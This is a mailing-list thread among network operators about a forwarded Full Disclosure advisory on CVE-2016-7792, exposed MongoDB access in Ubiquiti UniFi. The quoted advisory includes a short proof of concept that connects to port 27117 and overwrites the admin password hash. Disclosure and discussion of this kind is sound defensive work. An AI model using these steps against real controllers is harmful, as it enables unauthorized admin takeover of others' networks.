Well, this could be pretty crappy if you had a MSP and did layer3
provisioning like many do and your unifi server wasnt behind a firewall.
Connecting to the controller via layer3 is important, connecting to the db
directly sounds dangerous. I am curious why this port is left open?
Will have to scan my 5.4.x instances now.
On Oct 3, 2016 4:55 AM, "Adam Moffett" <dmmoff...@gmail.com> wrote:
> People do all kinds of things for all kinds of (dumb) reasons.
>
> The controller's db would not be accessible on the internet, but any wifi
> user might be able to do the exploit unless you take measures to prevent it.
>
>
> ------ Original Message ------
> From: "Paul Stewart" <p...@paulstewart.org>
> To: "Animal Farm" <af@afmug.com>
> Sent: 10/3/2016 4:10:28 AM
> Subject: [AFMUG] Fwd: [FD] Critical Vulnerability in Ubiquiti UniFi
>
>
> Don’t have time to test this out but thought I’d pass this along ….
>
> My first thought is why anyone would have their ports exposed across the
> internet to allow this to happen, if it’s possibly true….
>
> Paul
>
>
> Begin forwarded message:
>
> *From: *Tim Schughart <t.schugh...@prosec-networks.com>
> *Subject: **[FD] Critical Vulnerability in Ubiquiti UniFi*
> *Date: *September 30, 2016 at 5:49:26 AM EDT
> *To: *fulldisclos...@seclists.org, bugt...@securityfocus.com,
> webapp...@securityfocus.com
> *Cc: *"Khanh Quoc. Pham" <k.p...@prosec-networks.com>
>
> Hello @all,
>
> together with my colleague we found two uncritical vulnerabilities you'll
> find below.
>
> Product: UniFi AP AC Lite
> Vendor: Ubiquiti Networks Inc.
>
> Internal reference: ? (Bug ID)
> Vulnerability type: Incorrect access control
> Vulnerable version: Unify 5.2.7 and possible other versions affected (not
> tested)
> Vulnerable component: Database
> Report confidence: yes
> Solution status: Not fixed by Vendor, the bug is a feature.
> Fixed versions: -
> Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec
> Networks
> Solution date: -
> Public disclosure: 2016-09-30
> CVE reference: CVE-2016-7792
> CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
>
>
> Vulnerability Details:
> You are able to connect to the access points database, because of an
> broken authentication (OWASP TOP10). So you are able to modify the database
> and read the data. An possible scenario you'll find in PoC section.
>
> Risk:
> An attacker gets access to the database and for e.g. is able to change the
> admins password, like you see in PoC below.
>
> PoC:
> 1. Generate SHA512 Hash with e.g.
> mkpasswd -m sha-512
>
> 2. Connect via network to database, e.g. :
> mongo --port 27117 --host target_ip
>
> 3. Change password via command
> "db.admin.update({"name":"ProSec"}, {$set : {"x_shadow":
> "$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.
> nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})"
> 4. Login via web interface with new password
>
>
> Best regards / Mit freundlichen Grüßen
>
>
> Tim Schughart
> CEO / Geschäftsführer
>
> --
> ProSec Networks e.K.
> Ellingshohl 82
> 56077 Koblenz
>
> Website: https://www.prosec-networks.com
> E-Mail: t.schugh...@prosec.networks.com
> Mobile: +49 (0)157 7901 5826
> Phone: +49 (0)261 450 930 90
>
> "This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or
> LEGALLY PROTECTED information and is intended only for the named
> recipient(s). Any unauthorized use, dissemination, copying or forwarding is
> strictly prohibited. If you are not the intended recipient and have
> received this email communication in error, please notify the sender
> immediately, delete it and destroy all copies of this E-Mail. VAT ID:
> DE290654714 legal domicile Koblenz, HRA 21625.“
>
> "Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS
> UNTERLIEGENDE und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist
> ausschließlich für den/die genannten Adressaten bestimmt. Jede unbefugte
> Nutzung, Weitergabe, Vervielfältigung oder Versendung ist strengstens
> verboten. Sollten Sie nicht der angegebene Adressat sein und diese E-Mail
> Mitteilung irrtümlich erhalten haben, informieren Sie bitte sofort den
> Absender, löschen diese E-Mail und vernichten alle Kopien. USt-IdNr.:
> DE290654714, Amtsgericht Koblenz, HRA 21625."
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>
>
>
